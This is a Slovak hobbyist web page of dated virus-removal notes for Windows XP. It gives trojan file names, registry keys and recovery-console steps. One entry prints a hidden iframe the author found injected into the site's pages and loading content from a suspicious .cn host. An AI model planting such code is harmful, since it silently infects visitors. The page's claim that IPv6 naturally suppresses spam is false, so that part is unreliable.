Obrana proti vírusom
na hlavnú stránku
20.3.2010
lbofis.sys!
Podozrive posielanie dat, cinnost siete.
Riešenie:
Odstrániť cez System recovery console:
Nabootovať WinXP z CD a dať Repair (R) keď budete vyzvaní. Prihlásiť sa v konzole do danej inštalácie (ak nie je heslo tak len enter na password),
Neinfikuje, nesprava napadne. Treba odstranit lbofis.sys z jeho umiestnenia Windows\System32\drivers\
Bez restartu do mimo windows prostredia sa neda!
(HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_LBOFIS)
(HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\lbofis)
(HKEY_LOCAL_MACHINE\SYSTEM\ControlSet006\Enum\Root\LEGACY_LBOFIS)
(HKEY_LOCAL_MACHINE\SYSTEM\ControlSet006\Services\lbofis)
(HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_LBOFIS)
(HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lbofis)
20.3.2010
syspck32.exe!
Podozrive posielanie dat, cinnost siete.
Riešenie:
Odstrániť cez System recovery console:
Nabootovať WinXP z CD a dať Repair (R) keď budete vyzvaní. Prihlásiť sa v konzole do danej inštalácie (ak nie je heslo tak len enter na password),
Neinfikuje, nesprava napadne. Treba odstranit syspck32.exe z jeho umiestnenia Documents and Settings\používateľ\Start Menu\Programs\Startup
Pozor! Je skryty!
Bez restartu do mimo windows prostredia sa neda! Iba ak zhodenim sluzieb systemu (svchost)
11.4.2009
Win32 Banker a Win32 Sality!
Strašne zákerné vírusy, zvlášť Sality.
Riešenie:
Odstrániť cez System recovery console:
Nabootovať WinXP z CD a dať Repair (R) keď budete vyzvaní. Prihlásiť sa v konzole do danej inštalácie (ak nie je heslo tak len enter na password),
Sality je nebezpečný agresívny vírus. Šíri sa rapídne. Nainfikuje všetky dostupné súbory exe. Na vyhľadanie používa v registry uložené záznamy o naposledy spustených programoch.
Treba prepísať nakazené súbory s originálnymi exe.
potom spustiť chkdsk /r na vybrané jednotky.
Ak sa infikovali kritické procesy, ako sú winlogon.exe, services.exe, csrss.exe, lsass.exe, smss.exe treba postupovať takto:
1. Do adresára Windows\System32 vytvorte priečinok ZAL.
2. Do tohto priečinka skopírujte originálne súbory z inštalačného CD WinXP (sú komprimované MSCF - cabinet, koncovky EX_, treba ich dekomprimovať, systém by to mal zvládnuť).
3. Keď sú už dekomprimované, nastavte im atribút LEN NA ČÍTANIE.
4. Rebootujte s WinXP CD a spustite Recovery Console.(počkať do načítania a potom)
5. V konzole sa prihláste (zväčša je to prvá inštalácia - 1 a heslo žiadne, čiže enter)
6. Prejdite do adresára Windows\System32\ZAL cd windows\system32\ZAL (disková jednotka musí byť uvedená tiež)
7. skopírujte originálky do adresára System32:
copy csrss.exe windows\system32 (disková jednotka musí byť uvedená tiež)
copy smss.exe windows\system32 (disková jednotka musí byť uvedená tiež)
copy services.exe windows\system32 (disková jednotka musí byť uvedená tiež)
copy winlogon.exe windows\system32 (disková jednotka musí byť uvedená tiež)
copy lsass.exe windows\system32 (disková jednotka musí byť uvedená tiež)
8. V konzole napíšte exit a rebootujte, hotovo!
9. Na zistenie Sality postihnutých súborov použite OneCare Live On line antivírus (vyžaduje IE) a na dodatočnú kontrolu single súborov portal VirusTotal.
11.4.2009
Na stránke www.kgsm.sk!
Je tam vírus. Môže spôsobovať rozličné problémy. Môže kontaktovať iné lokality a sťahovať do PC škodliviny.
Ak vzniknú problémy:
Problém:
zablokovaný taskmanager a regedit
Riešenie:
1) spustiť príkaz:
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
2) spustiť príkaz:
command
3) v command spustiť regedit
4) následne v registry zrušiť zabezpečenie:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
HKEY_USERS\S-1-5-21-854245398-1580818891-1343024091-1003\Software\Microsoft\Windows\CurrentVersion\Policies
Vetva System, nastavenie:
DisableRegistryTools nastaviť na 0
DisableTaskMgr nastaviť na 0
Ak sa po kroku 4 stále prepisuje na 1, spustiť obnovu systému. Následne nainštalovať Avast! 4 home free. Spustiť kompletný test HDD jednotiek po inštalácii (zaškrtnúť políčko).
Ak sú porušené nastavenia IE a v IE sú problémy, napr.: nedá sa editovať textové políčko, nefunguje pravé tlačidlo a po zobrazení info o IE nastávajú chyby, použiť nasledovné:
REGSVR32 /i MSHTML.DLL
REGSVR32 JSCRIPT.DLL
REGSVR32 MSHTMLED.DLL
28.3.2009
Nový vírus!
Názov zmrda: Usynxwy Application
Umiestnenie: Windows\
Súbor: services.exe
Poznámka: Veľmi nebezpečný
Čo robí: Sťahuje a uploaduje informácie cez sieť
Ďalšie info:
- Možný pôvod: Rusko (jazyk .exe je Ruština)
Poznámka: Pozor! Nepomýliť s System32\Services.exe.
Poznámka č.2: Skontrólovať dátum vytvorenia/zmeny súboru a zmazať ten najčerstvejší.
Poznámka č.3: Poznať ho podľa toho, že je rezidentný a kritický proces systému.
Poznámka č.4: http://www.neuber.com/taskmanager/process/services.exe.html
Ako sa ho zbaviť:
Odstránenie: ak nepomôže zmazanie vetiev v registry, núdzový režim.
Ak sa nedá odstrániť a stále sa vracia, použiť obnovu systému (system restore point) a následne ho odmazať z jeho umiestnenia Windows\services.exe.
14.1.2009
Google označil túto stránku za (potenciálne) škodlivú
Pravdepodobné príčiny:
- Dementný google (a špeciálne jeho služna safebrowsing) označuje túto stránku a celú lokalitu jamo.wz.cz za potenciálne nebezpečnú:
http://www.google.sk/interstitial?url=http://jamo.wz.cz/
úplne protiprávne
- exe súbory na serveri v roote
- kód
škodlivý kód: iframe src="http://diettopseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"> /iframe
ktorý som objavil na všetkých htm,html. Odstránený
Výsledok:
- toto upozornenie je treba v každom prípade ignorovať, nakoľko sa na stránke NENACHÁDZA žiadny nežiadúci kód!
Riešenia
- odstránený kód iframe s podozrivým hidden atribútom
Prečo nie overenie cez google webmasters tools: problém s nájdením overovacej stránky http://jamo.wz.cz/google4318b8a2097b401b.html
ktorá ale JE na serveri a JE v roote.
14.1.2009
Nebezpečné trojany a vírusy
Trojan horse SHeur2.HSN
wpv021230259519.cpx (generický názov)
Základ objavenia: (manuálny sken) AVG, V. DB: 270.10.7/1893
Možné objaviť aj: (ručne prezretím) Windows\System32\
-=podľa dátumu vytvorenia/zmeny súboru=-
Trojan horse Agent_r.IE
wpv651230259577.cpx (generický názov)
Základ objavenia: (manuálny sken) AVG, V. DB: 270.10.7/1893
Možné objaviť aj: (ručne) Windows\System32\
-=podľa dátumu vytvorenia/zmeny súboru=-
Trojan horse Downloader.Agent.ARMN
Temp\EC65.tmp
Základ objavenia: (manuálny sken) AVG, V. DB: 270.10.7/1893
Možné objaviť aj: nie jednoznačne, priečinok Temp\ pravidelne premazávať, vo
väčšine prípadov súbory, ktoré sa už nepoužívajú sa môžu odstrániť, pokým súbory
používané majú zakázaný zápis/čítanie/mazanie a je to znak že sa ešte požívajú a nedajú
sa teda poškodiť (ale môžu to byť aj škodlivé kódy!!)
31.12.2008
Nebezpečné trojany a vírusy
TROJAN
E:\WINDOWS\system32\drivers\10e5ed95.sys (určite generický názov, na nete sa nič nenašlo)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\10e5ed95
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\10e5ed95
(Predvolené) | REG_SZ | (Hodn. nenast.)
ErrorControl | REG_DWORD | 0x00000001 (1)
ExtParamD | REG_BINARY| BB 94 23 ED 7C E9 FE 38 00 00
ImagePath | REG_SZ | \SystemRoot\System32\drivers\10e5ed95.sys
Start | REG_DWORD | 0x00000001 (1)
Type | REG_DWORD | 0x00000001 (1)
TROJAN AGENT-GJR: Troj/Agent-GJR Trojan
onecare.live.com --> TrojanDownloader:Win32/Bukash.A
Značka: najčastejšie UPX
hklm\software\microsoft\windows\currentversion\winlogon\notify\crypt
e:\windows\system32\crypts.dll
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt]
"StartShell"="Run"
"Impersonate"=dword:00000001
"DLLName"="crypts.dll"
"Asynchronous"=dword:00000001
Trojan horse Downloader Agent.APIM
E:\WINDOWS\System32\msansspc.dll
Trojan horse SHeur2.HSN
E:\WINDOWS\msauc.exe
Trojan horse Downloader.Agent.APIM
E:\Documents and Settings\?meno používateľa?\~.exe
Pozor aj na súbory s týmito názvami v iných adresároch. Pozor na zmeny dátumov na súboroch celkovo!
Pozor na registrovú vetvu \Winlogon a na podozrivé údaje v nej, pozor tiež na \Run vetvu a na vetvu \Services
!!!Je dôležité si dať pozor na crypts.dll -- hľadanie na nete ukázalo hrozbu. -- AVG hrozbu nenašiel.(v.8.0.227 db v.: 270.10.1/1870)
!!!!!Je dôležité si dať pozor na 10e5ed95 -- generický názov. Môže sa meniť, no treba si dať pozor na jeho súborovú
neprístupnosť!! Súbor je neprístupný a tak ho AVG nenašiel a neidentifikoval tak hrozbu (v.8.0.227 db v.: 270.10.1/1870)! Núdzový režim XP pomohol a súbor sa
podarilo odstrániť. Pozor na súbory so zakázaným prístupom (ani čítať).
Aj naďalej odporúčam windows live one care na adrese onecare.live.com
Pozor na adresáre 1. úroveň adresára Windows\, Windows\System32 a Windows\System32\Drivers.
Ďalej pozor na: Documents and Settings\ ?meno užívateľa?
30.10.2008
IPv6 internetový protokol
Nový trend v bezpečnosti internetu: IPv6
Hlavné bezpečnostné prínosy
- Prirodzené potlačenie SPAMu:
v hlavičke je okrem všeobecnej adresy veľkej siete, adresa menšej siete (napr. LAN) a aj adresa konkrétneho PC v sieti. Čo už neumožňuje posielanie hromadných správ (všeobecne adresovaných) všetkým v sieti.
- 128 bitové kódovanie adresy miesto 32 bitového (pri IPv4) = lepšie adresovanie.
17.12.2007
Používajte online sken:
- Kaspersky Anti-Virus: Free Online Virus Scanner
- McAfee Freescan
Rada: Pre spravnu konfiguraciu systemu (SERVICES.MSC bežný používateľ Win32 XP) NIE WIRELESS!:
POZN.: Udržujte svoj systém stále aktualizovaný.
POZN2.: Shell Hardware Detection je pre AutoPlay CD, ak chcete môžete nechať zapnutý.
25.12.07
IE Nastavenia ochrany osobných údajov - import zoznamu lokalít --- verzia 1:
Pozn.:
Na správne fungovanie sa k zablokovaným lokalitám odporúča nastaviť úroveň ochrany v politike zabezpečenia na vysokú (t.j. na o jednu menšiu ako maximum).
Použité cookies adresy
Vysvetlivky:
-
- blokované
-
- povolené
2o7.net ,
about.com,
adocean.pl,
adrenalinesk.sk,
adrevolver.com,
adtech.de,
advertising.com,
allyes.com,
atdmt.com,
bbmedia.cz,
billboard.sk,
burstnet.com,
cnw.cz,
com.com,
csfd.cz,
doubleclick.net,
falkag.de,
fastclick.net,
gamespy.com,
gemius.pl,
google.com,
googleadservices.com,
hitbox.com,
howstuffworks.com,
idot.cz,
ifilm.com,
ign.com,
indextools.com,
intellitxt.com,
last-minute-dovolenka.sk,
library.sk,
lingea.cz,
live.com,
mall.cz,
mastasia.com,
mediaplex.com,
microsoft.com,
naj.sk,
netspace.sk,
nytimes.com,
pobox.sk,
pointroll.com,
pricegrabber.com,
quantserve.com,
questionmarket.com,
revsci.net,
sfgate.com,
slide.com,
specificclick.net,
statcounter.com,
tacoda.net,
techspot.com,
toplist.cz,
toplist.sk,
tribalfusion.com,
uspesne-podnikanie.sk,
uverovykatalog.sk,
w3counter.com,
webcrawler.com,
webtrends.com,
webtrendslive.com,
yieldmanager.com,
youtube.com,
++
tatrabanka.sk,
zdielanie.sk,
ccbill.com,
POZOR NA: CLIPREX (produkty sú NAKAZENÉ !!!)
http://www.cliprex.com
Programy:
- mrt.exe Malicious software removal tool - Microsoft
- Spybot Search&Destroy
Zablokovať cookies pre:
- doubleclick.net, falkag.de, fastclick.net
-
1. Zmazanie cookies v
\Documents and Settings\meno užívateľa\Cookies\
WINDOWS\system32\config\systemprofile\Cookies\
Cookies môže obsahovať spyware. Aj podľa http://www.webring.sk/weblog/category/ochrana-pc/
-
2. Kontrola:
\WINDOWS\system32\drivers\etc\hosts
Podozrivé hosty eliminovať, nechať len localhost.
-
3. Spustenie:
procesov a služieb cez msconfig.exe
Eliminovať podozrivé služby a aplikácie odškrtnutím.
-
4. Kontrola:
\WINDOWS\
\WINDOWS\system32\
\WINDOWS\system32\drivers\
\WINDOWS\system32\drivers\etc\
Pokúsiť sa pozrieť adresár (Total Commander) a zoradiť si ho podľa dátumu. Podozrivé (neznáme) súbory majú zvyčajne novší dátum, približný dátum začiatku výskytu problému. Podobne aj infikované súbory majú väčšinou prepísaný aj dátum.
Poznámka: Pozor najmä na .exe a .dll súbory.
-
5. Kontrola registrov:
Vetvy:
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run, RunOnce, RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, RunOnce
-
6. Kontrola TaskManager + Software Explorer (služba windows defender) v Control Panel:
Ak sa ukáže, že systém je spomaľovaný, pozrieť inkriminovanú aplikáciu cez TaskManager ALT+CTRL+DELETE.
V prípade, že sa jedná o službu (napr. svchost), skontrolovať do siete pripojené služby na moduloch svchost:
OK - svchost.exe (Remote Procedure Call - RPC)
OK - svchost.exe (DNS Client)
OK - svchost.exe (Windows Audio, Background Intelligent Transfer Service,
Cryptographic Services, DHCP Client, Logical Disk Manager, Error Reporting Service, COM+ Event System, Help and Support, Network Connections, Remote Access Connection Manager, Task Scheduler, System Event Notification, Windows Firewall/Internet Connection Sharing (ICS), Shell Hardware Detection, Telephony, Themes, Distributed Link Tracking Client, Windows Time, Windows Management Instrumentation, wuauserv)
V inom prípade, ak sa jedná o program (možno neznámy), skontrolovať antivírusom, nemazať systémové súbory Windows!!! Vyhľadať ho na disku, skontrolovať výrobcu vo vlastnostiach.
Poznámka: Alternatívne môžu byť aktivované služby pre čítanie pamäťových kariet, služby Wi-Fi a niektoré špecifické služby, ktoré tu niesú uvedené. Dôležité je cez TaskManager zistiť PID (process ID) a v Software Exploreri nájsť modul, s týmto číslom. Tam hľadať služby.
-
7. Prehliadač:
V prehliadači nesťahovať nepodpísane ActiveX, podpísané áno. Vypnúť nepoužívané (podozrivé) doplnky a komponenty. Aktualizovať prehliadač. Cookies zabezpečenie nastaviť na vyššiu úroveň. Alternatívne určiť lokality, ktoré nemôžu používať cookies (napríklad Panda určí súbor cookies "doubleclick" ako spyware). Lokalitu zistíte tak, že nahliadnete do inkriminovaného spyware cookie a všetky nájdené adresy zakážete pre cookies používať.
Len ak sa určí ako spyware!!!
Spyware cookies určí Panda, nie OneCare!!!
-
8. Firewall:
Ak firewall v systéme nie je iné rady sú zbytočné. Nainštalovať firewall
Keď nie iný tak aspoň windows firewall (WinXP so SP2). A nepovoliť výnimky.
Poznámka: Špeciálne v prípade Wi-Fi používať šifrovaný protokol a spojenie. Dbať na ochranu siete a filtrovať každý neznámy program. Windows firewall nestačí.
Ak uvedené rady nefungujú, spustiť v núdzovom režime.
Ak sa súbor zmazať nedá a jedná sa o .dll súbor použiť regsvr32 s parametrom -u
Ak sa súbor zmazať nedá a nejedná sa o .dll, pokúsiť sa vyhľadať súbor v databáze registry
...